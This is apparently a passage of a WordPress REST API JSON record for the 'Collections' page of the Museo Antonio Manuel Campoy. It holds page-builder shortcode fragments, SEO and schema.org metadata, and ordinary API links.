image=&#8221;529&#8243; img_size=&#8221;full&#8221; qode_css_animation=&#8221;&#8221;][vc_empty_space][vc_column_text] The Antonio Manuel Campoy Museum (MAMC) in figures. [\/vc_column_text][vc_column_text] Within what we can call works, we will distinguish two main modalities when it...","og_url":"https:\/\/www.museodeartecontemporaneo.es\/en\/collections\/","og_site_name":"Museo Antonio Manuel Campoy","article_modified_time":"2021-11-25T10:03:01+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"12 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/www.museodeartecontemporaneo.es\/#website","url":"https:\/\/www.museodeartecontemporaneo.es\/","name":"Museo Antonio Manuel Campoy","description":"Otro sitio realizado con WordPress","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.museodeartecontemporaneo.es\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.museodeartecontemporaneo.es\/en\/collections\/#webpage","url":"https:\/\/www.museodeartecontemporaneo.es\/en\/collections\/","name":"Collections - Museo Antonio Manuel Campoy","isPartOf":{"@id":"https:\/\/www.museodeartecontemporaneo.es\/#website"},"datePublished":"2021-09-30T17:56:20+00:00","dateModified":"2021-11-25T10:03:01+00:00","breadcrumb":{"@id":"https:\/\/www.museodeartecontemporaneo.es\/en\/collections\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.museodeartecontemporaneo.es\/en\/collections\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.museodeartecontemporaneo.es\/en\/collections\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/www.museodeartecontemporaneo.es\/en\/"},{"@type":"ListItem","position":2,"name":"Collections"}]}]}},"_links":{"self":[{"href":"https:\/\/www.museodeartecontemporaneo.es\/en\/wp-json\/wp\/v2\/pages\/278","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.museodeartecontemporaneo.es\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.museodeartecontemporaneo.es\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.museodeartecontemporaneo.es\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.museodeartecontemporaneo.es\/en\/wp-json\/wp\/v2\/comments?post=278"}],"version-history":[{"count":9,"href":"https:\/\/www.museodeartecontemporaneo.es\/en\/wp-json\/wp\/v2\/pages\/278\/revisions"}],"predecessor-version":[{"id":948,"href":"https:\/\/www.museodeartecontemporaneo.es\/en\/wp-json\/wp\/v2\/pages\/278\/revisions\/948"}],"wp:attachment":[{"href":"https:\/\/www.museodeartecontemporaneo.es\/en\/wp-json\/wp\/v2\/media?parent=278"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}